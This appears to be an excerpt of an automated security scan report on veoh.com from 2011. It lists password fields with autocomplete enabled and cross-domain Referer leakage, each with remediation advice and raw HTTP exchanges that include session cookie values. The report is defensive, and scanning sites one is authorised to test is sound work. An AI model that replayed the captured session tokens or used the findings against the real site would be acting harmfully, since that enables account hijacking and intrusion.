Date: Thu, 03 Feb 2011 20:30:37 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=53
Content-Length: 134607

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...

6. Password field with autocomplete enabled  previous  next
There are 8 instances of this issue:

Issue background

Most browsers have a facility to remember user credentials that are entered into HTML forms. This function can be configured by the user and also by applications which employ user credentials. If the function is enabled, then credentials entered by the user are stored on their local computer and retrieved by the browser on future visits to the same application.

The stored credentials can be captured by an attacker who gains access to the computer, either locally or through some remote compromise. Further, methods have existed whereby a malicious web site can retrieve the stored credentials for other applications, by exploiting browser vulnerabilities or through application-level cross-domain attacks.

Issue remediation

To prevent browsers from storing credentials entered into HTML forms, you should include the attribute autocomplete="off" within the FORM tag (to protect all form fields) or within the relevant INPUT tags (to protect specific individual fields).


6.1. http://www.veoh.com/favorites  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /favorites

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /favorites HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:47:12 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=97
Content-Length: 25409

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
</div>

       <form id="loginForm" action="/login/submit" method="post" onsubmit="return VeohUtils.login();">
           <label>
...[SNIP]...
</label>
           <input type="password" name="p" id="login-p" /><div class="clear">
...[SNIP]...

6.2. http://www.veoh.com/login  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /login

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /login HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:45:54 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=94
Content-Length: 25417

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
</div>

       <form id="loginForm" action="/login/submit" method="post" onsubmit="return VeohUtils.login();">
           <label>
...[SNIP]...
</label>
           <input type="password" name="p" id="login-p" /><div class="clear">
...[SNIP]...

6.3. http://www.veoh.com/messages/inbox  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /messages/inbox

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /messages/inbox HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:47:09 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=86
Content-Length: 25409

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
</div>

       <form id="loginForm" action="/login/submit" method="post" onsubmit="return VeohUtils.login();">
           <label>
...[SNIP]...
</label>
           <input type="password" name="p" id="login-p" /><div class="clear">
...[SNIP]...

6.4. http://www.veoh.com/myinterests  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /myinterests

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /myinterests HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:46:07 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=94
Content-Length: 25409

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
</div>

       <form id="loginForm" action="/login/submit" method="post" onsubmit="return VeohUtils.login();">
           <label>
...[SNIP]...
</label>
           <input type="password" name="p" id="login-p" /><div class="clear">
...[SNIP]...

6.5. http://www.veoh.com/myplaylists  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /myplaylists

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /myplaylists HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:47:22 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=96
Content-Length: 25387

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
</div>

       <form id="loginForm" action="/login/submit" method="post" onsubmit="return VeohUtils.login();">
           <label>
...[SNIP]...
</label>
           <input type="password" name="p" id="login-p" /><div class="clear">
...[SNIP]...

6.6. http://www.veoh.com/myprofile/videos  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /myprofile/videos

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /myprofile/videos HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:47:18 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=56
Content-Length: 25399

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
</div>

       <form id="loginForm" action="/login/submit" method="post" onsubmit="return VeohUtils.login();">
           <label>
...[SNIP]...
</label>
           <input type="password" name="p" id="login-p" /><div class="clear">
...[SNIP]...

6.7. http://www.veoh.com/publish/video  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /publish/video

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /publish/video HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:46:39 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=71
Content-Length: 25294

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
</div>

       <form id="loginForm" action="/login/submit" method="post" onsubmit="return VeohUtils.login();">
           <label>
...[SNIP]...
</label>
           <input type="password" name="p" id="login-p" /><div class="clear">
...[SNIP]...

6.8. http://www.veoh.com/register  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /register

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /register HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:45:51 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=86
Content-Length: 52657

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
</div>

       <form id="form-register" method="POST">

           <fieldset>
...[SNIP]...
</label>
               
<input type="password" name="password" id="password" value="" />                
               <label for="password2">
...[SNIP]...
</label>
               
<input type="password" name="password2" id="password2" value="" />                
               <label for="countryId">
...[SNIP]...

7. Cross-domain Referer leakage  previous  next
There are 3 instances of this issue:

Issue background

When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.

If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.

You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.

Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.

Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.

Issue remediation

The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.


7.1. http://www.veoh.com/browse/videos/category/action_adventure/watch/v18978294NGnK88j8/x26amp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/videos/category/action_adventure/watch/v18978294NGnK88j8/x26amp

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /browse/videos/category/action_adventure/watch/v18978294NGnK88j8/x26amp;rct\\x3dj\\x26amp;sa\\x3dX\\x26amp;ei\\x3digxLTa3XKZOdgQfJltnlDw\\x26amp;sqi\\x3d2\\x26amp;ved\\x3d0CF0QuAIwCQ\\x26amp;q\\x3dsmartdesis\\x26amp;usg\\x3dAFQjCNGfJXOedr8EFUHoDTuNwPlaSxDDIA\\x22\\x3e\\x3cdiv HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Set-Cookie: veohCookie="VisitorUID=B57D97F4-FEFC-1CDA-FD1E-C2AF21F84319&LastUpdate=03/Feb/2011:12:30:37 -0800&first=0"; domain=.veoh.com; Expires=Mon, 02 Feb 2015 20:30:37 GMT; Path=/
Date: Thu, 03 Feb 2011 20:30:37 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=80
Content-Length: 134607

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<link href="http://www.veoh.com/veohplayer.swf?permalinkId=v18978294NGnK88j8&amp;player=videodetailsembedded&amp;contentRatingId=1" rel="video_src" type="application/x-shockwave-flash" /><script type="text/javascript" src="http://cdn.taboolasyndication.com/libtrc/veoh/rbox.js?video_id="></script>
...[SNIP]...
<body>
       <script src="http://www.google-analytics.com/ga.js" type="text/javascript"></script>
...[SNIP]...
</script>


<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
<li id="nav-twitter">
               <a title="Twitter" href="http://www.twitter.com/veoh" target="_blank" onclick="trackClickInGA('/homepage/twitter');"><img border="0" src="http://ll-appserver.veoh.com/images/nav-twitter.png" />
...[SNIP]...
<li id="nav-facebook">
               <a title="Facebook" href="http://www.facebook.com/pages/Veoh/129836657035793" target="_blank" onclick="trackClickInGA('/homepage/facebook');"><img border="0" src="http://ll-appserver.veoh.com/images/nav-facebook.png" />
...[SNIP]...
<div id="contentHolder" class="watchOpened">
                   <script type="text/javascript" src="http://api.conduit.com/ToolbarApi.js"></script>
...[SNIP]...
<!-- qlipso client -->
           <script type="text/javascript" src="http://www.qlipso.com/share/scripts/qlipso.js?v=1.0.1.1215b"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.qlipso.com/share/scripts/QlipsoConfig.js?v=1296765037"></script>
...[SNIP]...
</span>
       <a class="button sp_button-blue" href="http://www.adobe.com/shockwave/download/download.cgi?P1_Prod_Version=ShockwaveFlash"><span>
...[SNIP]...
<a href="http://www.veoh.com/users/Veoh-Action-Anime">
<img src="http://static.qlipso.com/share/Resources/0/0/10/RoomThumb.10650.2c603d6edb9e44339cf5a82943ef8b04.jpg" width="58px;" height="58px;" class="qlipsoRoomThumb"/>
<div class="qlipsoOnlineStatus">
...[SNIP]...
<a href="http://www.veoh.com/users/Veoh-Horror-Movies">
<img src="http://static.qlipso.com/share/Resources/0/0/10/RoomThumb.10650.9d76b62635aa43948f525b2cc46e8958.jpg" width="58px;" height="58px;" class="qlipsoRoomThumb"/>
<div class="qlipsoOnlineStatus">
...[SNIP]...
<a href="http://www.veoh.com/users/MitchRider">
<img src="http://static.qlipso.com/share/Resources/0/0/10/RoomThumb.10650.1e075a3674f74e27a7cb4808ae42d91f.jpg" width="58px;" height="58px;" class="qlipsoRoomThumb"/>
<div class="qlipsoOnlineStatus">
...[SNIP]...
</a>
           <a href="http://www.facebook.com/share.php?u=http%3A%2F%2Fwww.veoh.com%2Fbrowse%2Fvideos%2Fcategory%2Faction_adventure%2Fwatch%2Fv18978294NGnK88j8" target="_blank" class="icon sp_facebook" title="Share on Facebook"></a>
           <a href="http://www.myspace.com/Modules/PostTo/Pages/?u=http%3A%2F%2Fwww.veoh.com%2Fbrowse%2Fvideos%2Fcategory%2Faction_adventure%2Fwatch%2Fv18978294NGnK88j8&t=Magadheera+SmartDesis.TK.mp4&c=action" class="icon sp_myspace" target="_blank" title="Share on MySpace"></a>
           <a href="http://twitter.com/home?status=Watch: http%3A%2F%2Fwww.veoh.com%2Fbrowse%2Fvideos%2Fcategory%2Faction_adventure%2Fwatch%2Fv18978294NGnK88j8" class="icon sp_twitter" target="_blank" title="Share on Twitter"></a>
...[SNIP]...
<div id="moreShareIcons" class="hide">
               <a href="http://digg.com/submit?url=http%3A%2F%2Fwww.veoh.com%2Fbrowse%2Fvideos%2Fcategory%2Faction_adventure%2Fwatch%2Fv18978294NGnK88j8&title=Magadheera+SmartDesis.TK.mp4&bodytext=action&media=video&topic=movies" target="_blank" title="Digg This" class="icon sp_digg"></a>
               <a href="http://delicious.com/save?url=http%3A%2F%2Fwww.veoh.com%2Fbrowse%2Fvideos%2Fcategory%2Faction_adventure%2Fwatch%2Fv18978294NGnK88j8&title=Magadheera+SmartDesis.TK.mp4&notes=action" target="_blank" title="Save a Bookmark on Delicious" class="icon sp_delicious"></a>
               <a href="http://www.stumbleupon.com/submit?url=http%3A%2F%2Fwww.veoh.com%2Fbrowse%2Fvideos%2Fcategory%2Faction_adventure%2Fwatch%2Fv18978294NGnK88j8&title=Magadheera+SmartDesis.TK.mp4" target="_blank" title="Stumble it" class="icon sp_stumbleupon"></a>
...[SNIP]...
<a href="http://www.veoh.com/users/Veoh-Action-Anime">
<img src="http://static.qlipso.com/share/Resources/0/0/10/RoomThumb.10650.2c603d6edb9e44339cf5a82943ef8b04.jpg" width="58px;" height="58px;" class="qlipsoRoomThumb"/>
<div class="qlipsoOnlineStatus">
...[SNIP]...
<a href="http://www.veoh.com/users/Veoh-Horror-Movies">
<img src="http://static.qlipso.com/share/Resources/0/0/10/RoomThumb.10650.9d76b62635aa43948f525b2cc46e8958.jpg" width="58px;" height="58px;" class="qlipsoRoomThumb"/>
<div class="qlipsoOnlineStatus">
...[SNIP]...
<a href="http://www.veoh.com/users/MitchRider">
<img src="http://static.qlipso.com/share/Resources/0/0/10/RoomThumb.10650.1e075a3674f74e27a7cb4808ae42d91f.jpg" width="58px;" height="58px;" class="qlipsoRoomThumb"/>
<div class="qlipsoOnlineStatus">
...[SNIP]...
<a href="http://www.veoh.com/users/Veoh-Upcoming-Movies">
<img src="http://static.qlipso.com/share/Resources/0/5/193/RoomThumb.5193736.2c5c689b2f5f45368a9547702fc35410.jpg" width="58px;" height="58px;" class="qlipsoRoomThumb"/>
<div class="qlipsoOnlineStatus">
...[SNIP]...
<li><a id="footer-twitter" href="http://www.twitter.com/veoh" title="Twitter">Twitter</a>
...[SNIP]...
<li><a href="http://veoh.tv/ccjjew">Feedback</a>
...[SNIP]...
</div>

<script type="text/javascript" src="http://ll.static.abc.go.com/s/syn/remoteplayer?partner=veoh"></script>
<script type="text/javascript" src="http://m2.fwmrm.net/g/lib/1.1/js/fwjslib.js?version=1.1"></script>
<!-- JS for Adap.tv -->
<script type="text/javascript" src="http://redir.adap.tv/redir/javascript/lightintegration.js"></script>

<script type="text/javascript" src="http://insight-s3.exelator.com/i200512.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://api.recaptcha.net/js/recaptcha_ajax.js"></script>
...[SNIP]...
<noscript>
       <a href="http://www.quantcast.com/p-aasG6JkxVvmNA" target="_blank">
           <img src="http://pixel.quantserve.com/pixel/p-aasG6JkxVvmNA.gif" style="display: none;" border="0" height="1" width="1" alt="Quantcast"/>
       </a>
...[SNIP]...

7.2. http://www.veoh.com/browse/videos/category/action_adventure/watch/v18978294NGnK88j8/x26amp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/videos/category/action_adventure/watch/v18978294NGnK88j8/x26amp

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /browse/videos/category/action_adventure/watch/v18978294NGnK88j8/x26amp;rct\\x3dj\\x26amp;sa\\x3dX\\x26amp;ei\\x3digxLTa3XKZOdgQfJltnlDw\\x26amp;sqi\\x3d2\\x26amp;ved\\x3d0CF0QuAIwCQ\\x26amp;q\\x3dsmartdesis\\x26amp;usg\\x3dAFQjCNGfJXOedr8EFUHoDTuNwPlaSxDDIA\\x22\\x3e\\x3cdiv HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:27:45 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=94
Content-Length: 134607

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<link href="http://www.veoh.com/veohplayer.swf?permalinkId=v18978294NGnK88j8&amp;player=videodetailsembedded&amp;contentRatingId=1" rel="video_src" type="application/x-shockwave-flash" /><script type="text/javascript" src="http://cdn.taboolasyndication.com/libtrc/veoh/rbox.js?video_id="></script>
...[SNIP]...
<body>
       <script src="http://www.google-analytics.com/ga.js" type="text/javascript"></script>
...[SNIP]...
</script>


<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
<li id="nav-twitter">
